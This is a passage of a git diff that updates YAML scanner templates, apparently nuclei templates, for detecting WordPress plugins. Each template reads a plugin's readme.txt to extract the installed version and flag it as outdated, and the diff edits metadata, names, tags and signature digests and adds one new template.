https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009774ab3256d0022a2225512717aff64e9489ba663c73f90235b522461abfaf890220509167c6326484a0c6cec67103be52966d981c519759ab34a4d27c1af24fa376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 99592111eb..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204e7d0dede43e03cabaa29c1759ad0239a21d3d894b986fc7378ee17d538007fa022034ce4d9bdd6c558a0fe1a43bf012bb87bcea3ef9b60553c3254cfebaf0915f7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index a98d8ad989..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e8697b321f3b7c421a92a74e57ca49106c5a2ce40943628f57fbd3d803b390702200d1366d680e462e693ccf5b29f23655ffb2e4244140854c3fb1091cbc53f79c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 51b38803d1..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100834c80323ba79362ea5ee5c25b5de19171905d24e44a47064c8ecab88734c0bc0220359ee288f95141d9b770922bebf03b837ef046cc956d4d3e7cb88cab9b62629f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index e490edb4ab..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009f7d2e3370fa930b184e11a58816f9bc0034127f755109bb8c7115f030a10ee702200dbe8506eea9df7e887f75d9b5797a222173ae2ff129b3d7e9de02c030316d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 22e70fb1c3..d94b4228a9 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -1,19 +1,19 @@ id: wordpress-cookie-law-info info: - name: CookieYes | GDPR Cookie Consent & Compliance Notice (CCPA Ready) Detection + name: CookieYes – Cookie Banner for Cookie Consent (Easy to setup GDPR/CCPA Compliant Cookie Notice) Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cd994a6daacb75a594427f47c0451cebdd54258b1a25a7cf36a6d25427dcd005022100a48d719e547110452b953c31fd433e4399ee21e1706952cf29004ab6a4444f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index fbf35aeea3..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f41855949283550c67acc76e3e6bb927be843e07048ca86663a8d935602ab2d7022027c24fc8d470918f23d5264578b3f484fe530b88dbbec0eff11ded25ffc76695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml new file mode 100644 index 0000000000..1b4769d0a7 --- /dev/null +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -0,0 +1,49 @@ +id: wordpress-copy-delete-posts + +info: + name: Duplicate Post Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/copy-delete-posts/ + metadata: + plugin_namespace: copy-delete-posts + wpscan: https://wpscan.com/plugin/copy-delete-posts + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/copy-delete-posts/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/copy-delete-posts.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 13b1b0d8d4..c2cd4ede1b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206fc80394e3d0f0b762445b02ed393d3eacb700c39c3405dd7ec9eb2ad2a43aea0220767c2c7547f0df7c7b14c1af3eb63ccfeef39eb70d398d36dad51f090452e6e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 3b0684f6d3..03e6c13ec5 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203593d70a196258e38962a780ef8aa38f97df2d4467ccd70f19c0d488baa6281d022064a084ae5705df4284d29191edb7cc52456e29732e6958413d4190f173bf91cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 6a30762266..cfac0b961b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: - max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220324c6719973b44cb9d66fa1e7a77d8441042e91560c573b0557830490a7762a3022001c6f3183c331b8219cb611afd6e0118ccf5cff8b3def10e7f7e35efb3cf8743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index b6605ae56b..846761f2f7 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: - max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201fb94ebf61bdaaa427c48c382576b5dd048ef9eb0f6a44e3cf025f5f9455dd1302202e7cf378395ec53591a64d701fc934b7ab1729ae7567472e0723e63398fc9b18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index dfed78a866..0def6e61ca 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: - max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a76279e6199116e1adbdc95180d25dbfbd5463673ed1f1a95b647e716dc1de002202b29d4ef38712fe3d09d2d0e4a918ea9769b3351db3e8d758a80d16c70c1071e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 3d98e3aa52..5c5decc127 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: - max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b600232b7c97a9752a1522dd496fbfa682c54591f6434046eb531b1b9b1e880022100c9ddda0bf6928d30cb59fdb5abdfb6492db91e396a11948dbd9c24ff787ae6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index e4118fb759..a8229a338e 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: - max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022067f70649a8de3e5c44e9f71f42b85e8a6034b4727f3bea927daec9554d809358022072d2ac8699316da73f80f23e860e99cd95efed16d91c5339134d5e83a6906b92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 22069da7b4..6559e64dce 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: - max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100aefc6f5c400982da77e05ac97e741261a881435c00347b1e58bf92cea69af5f102204affc989ceaee780b381a8f5dcdb81f5d9d4863571af905c181ff858a6840973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 3899e5df74..a4368b8aa6 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: - max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c096b4c5b9eefeab924754a9c9f67f451ac43d357a319d5ea529425ee4f4d00e022047f485b8acce6d2a26c51200c9dcf45204d460453488374b065aae687e13aaf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index f849238eea..d74de07e8e 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -1,19 +1,19 @@ id: wordpress-duplicator info: - name: Duplicator – WordPress Migration & Backup Plugin Detection + name: Duplicator – Migration & Backup Plugin Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/duplicator/ metadata: - max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203d3bb63ccc2f3753c8dae8a29e3938b48119a7b6041941302aa9ae8ee10edf82022100cada44c817baaccd55659d8ca1e5cb6d6010022ff2816cea6ff2645ac8db5419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 8636cf51fb..e5cfe47925 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -1,19 +1,19 @@ id: wordpress-duracelltomi-google-tag-manager info: - name: GTM4WP Detection + name: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: - max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207bb6fb114c571bfd5695c5c6eb2166f85080d570fce9617689d96d5915895405022100cb9e22a6ac8b4b00cbd96575e75e8989ce02bd3ef9907e095ed48fdf558ccf68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 6018e1da5b..fc44375947 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: - max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c746f9dc213de69d8dbd47da61a0ac6c35077beca9c4d4082a7f46c7cb1e4f4b02205f532ff6bb5535c203e1727c0ab3f570636603920b327abcfd82e503903784a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index 325442c9a1..a1616c1741 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: - max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034cfb31c9c9e8ff852fb37cb7eca9db5d4ed34e4510ef19621b414146094f3e3022056eb68893642be5f01d027511fa84b14442bfa6681978496d88dc4d13c45501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 7ad1f79fa0..6cfb8bc272 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: - max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204379dda89df7b101b4dab979b973469e364a667d943eea88530653c20806857c022100823ef633019bfa47181ac2336b2cd51df6ef1553b75b34adb35f65596c73e576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index e75b893731..9caaa53263 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: - max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100872d7b6284231343b009011424076302c4ac104f4b560f77b95e24b79f6310ec02204f6ffd04d97b104003458830c7bea30daf5f6e2754c24369bd6a3dee675c0801:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 6dc9ae3c8e..5e6b557952 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: - max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a361120b037df40ebaf02f14bff625c4acce830e8abc5deaaa4a02c7c5d11ecb022100f699513bbb297b8facbd2c673947e678f2de4f42f8f81fd498143bf3db16acf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 5aee1e42f9..c5a665e6f7 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: - max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220472d5c12ea01035a89638b643671d2ad97138f8b007bee38dc36acff6eb95bf402200e9aeb00897a04dd90b86fb81ed5e835d1671d424e0e4bbd7d5f86392e640446:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 440455da0c..d86e0557ae 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -1,19 +1,19 @@ id: wordpress-essential-addons-for-elementor-lite info: - name: Essential Addons for Elementor – Best Elementor Widgets With Kits, Templates & WooCommerce Builders Detection + name: Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: - max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f4d4536b494fe3fd2c8a307186feae439391e18144fc4598eff2695b69fbe7eb02205ecd4097e6616b6b054cb29b3db6f872b43810c84bee264896bd6ebaf9e835ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 093701e38d..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: - max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008ef875151474cb22cb35ba42271ad6bca21879435615004abd454067fbd5afcd02203e3def7ca135a110bd5ac8d3d311666d29877a5a19444b5c1ae272c85f5b1d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index abf32fb7c4..4ae34395fa 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce - tags: tech,wordpress,wp-plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b970a45e8d3c6fba0a16d5ec06f958c713207fb0bd6fa235bc6941397982cf2502203fc8072f4aa89217dce8ef66964be2662bee5fa791665d701d2e6d4cb84d52e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 5e9f1de0be..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: - max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/fast-indexing-api/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210083d3d17b65c6da313ef9f0fc4fcaf13a68dd9329d5567c3d9717d1f5f1b404b702200bae12d7275764f90efa374ee1717e647ecaf9ee94aadfc08a69a6d14f34365f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 7810804312..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: - max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 http: - method: GET + path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# 